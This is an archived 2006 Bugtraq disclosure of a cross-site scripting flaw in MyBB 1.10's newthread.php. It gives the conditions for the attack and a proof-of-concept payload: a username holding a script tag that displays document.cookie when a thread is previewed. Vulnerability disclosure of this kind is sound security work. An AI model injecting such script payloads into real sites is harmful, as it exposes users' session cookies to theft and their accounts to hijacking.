lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060409211408.28490.qmail@securityfocus.com> Date: 9 Apr 2006 21:14:08 -0000 From: o.y.6@...mail.com To: bugtraq@...urityfocus.com Subject: MyBB 1.10 'newthread.php' < CrossSiteScripting > MyBB 1.10 'newthread.php' < CrossSiteScripting > [ Devil-00 | D3vil-0x1 ] [*] Conditions [*] 1- your unregisterd user 2- you have permissions to do newthread [---------------] do newthread with this username :- <script>alert(document.cookie);</script>D3vil-0x1 Then Preview it ;) [---------------]